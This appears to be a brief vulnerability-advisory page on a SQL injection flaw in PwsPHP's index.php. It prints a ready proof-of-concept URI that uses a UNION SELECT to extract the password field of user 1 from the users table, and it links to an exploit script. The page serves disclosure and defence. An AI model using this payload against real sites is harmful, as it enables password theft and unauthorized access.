PwsPHP Index.PHP SQL Injection Vulnerability

info
discussion
exploit
solution
references

PwsPHP Index.PHP SQL Injection Vulnerability

An exploit is not required.

The following proof-of-concept URI is available:

http://www.example.com/pwsphp/index.php?mod=espace_membre&ac=message&id=999999'/**/UNION/**/SELECT/**/%60pass%60/**/FROM/**/%60users%60/**/WHERE/**/id='1'/*

The following exploit code by papipsycho is also available:

http://www.securityfocus.com/data/vulnerabilities/exploits/PwsPHP_SQL_Inj.php